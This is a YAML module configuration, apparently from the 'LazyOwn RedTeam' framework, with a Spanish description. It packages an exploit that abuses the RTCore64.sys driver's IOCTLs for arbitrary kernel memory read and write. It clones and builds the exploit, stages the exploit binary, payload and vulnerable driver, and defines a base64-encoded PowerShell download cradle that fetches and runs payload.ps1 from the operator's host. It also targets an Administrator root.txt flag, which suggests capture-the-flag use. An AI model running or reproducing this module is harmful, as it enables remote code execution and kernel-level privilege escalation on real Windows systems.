name: CVE-2022-22077
description: >
  El driver RTCore64.sys expone IOCTLs que permiten a cualquier usuario (incluso de bajos privilegios) leer y escribir arbitrariamente en memoria física y del kernel, lo que permite:
author: "LazyOwn RedTeam"
version: "1.0"
enabled: true
params:
  - name: lhost
    type: string
    required: true
    description: lhost target.
tool:
  name: CVE-2022-22077
  repo_url: https://github.com/grisuno/CVE-2022-22077.git
  install_path: external/.exploit/CVE-2022-22077
  install_command: ./install.sh
  execute_command: git restore . ; git pull ; chmod +x *.sh && ./build.sh && cp payload.ps1 ../../../sessions/payload.ps1 && cp exploit.exe ../../../sessions/exploit.exe && cp RTCore64.sys ../../../sessions/RTCore64.sys
  download_file: C:\Users\Administrator\Desktop\root.txt
  lazycommand: >-
    encodewinbase64 powershell -c 'IEX (New-Object Net.WebClient).DownloadString(\"http://{lhost}/payload.ps1\")'